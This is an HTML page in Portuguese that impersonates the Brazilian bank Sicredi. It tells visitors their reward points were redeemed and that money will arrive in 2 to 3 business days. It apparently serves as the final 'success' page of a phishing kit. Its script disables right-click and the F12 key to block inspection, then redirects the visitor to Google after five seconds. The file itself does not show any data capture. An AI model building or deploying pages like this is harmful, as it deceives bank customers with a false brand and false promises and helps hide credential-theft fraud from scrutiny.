<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Resgate Realizado</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f5f5f5;
            margin: 0;
            padding: 0;
        }

        .container {
            background-color: #ffffff;
            border: 2px solid #33820d;
            border-radius: 20px;
            padding: 20px;
            text-align: center;
            width: 100%;
            max-width: 600px;
            box-sizing: border-box;
        }

        .sucesso-img {
            max-width: 100px;
            margin-bottom: 20px;
        }

        .sucesso-msg {
            font-size: 18px;
            color: #333;
        }

        footer {
            margin-top: 30px;
            font-size: 12px;
            color: #666;
        }
    </style>
    <script>
        // Função para redirecionar após 5 segundos
        function redirecionar() {
            setTimeout(function() {
                window.location.href = "https://www.google.com"; // Altere para o site que você deseja redirecionar
            }, 5000); // 5000 milissegundos = 5 segundos
        }

        // Desabilita o clique direito e a inspeção de elementos
        document.addEventListener('contextmenu', function(event) {
            event.preventDefault();
        });

        // Previne a tecla F12
        document.addEventListener('keydown', function(event) {
            if (event.keyCode === 123) {
                event.preventDefault(); // F12
            }
        });

        // Chama a função assim que a página for carregada
        window.onload = redirecionar;
    </script>
</head>
<body>

    <div class="container">
        <img src="images.png" alt="Imagem de Sucesso" class="sucesso-img">
        <p class="sucesso-msg"><strong>Resgate Realizado com Sucesso!</strong><br>
            Dentro de 2 a 3 dias úteis seus pontos convertidos em $ estarão em sua conta!<br><br>
            <span>Equipe Banco Cooperativo Sicredi S.A.!</span>
        </p>
        <footer>
            <p><span class="negrito">© Banco Cooperativo Sicredi S.A.</span> Todos os direitos reservados</p>
        </footer>
    </div>

</body>
</html>
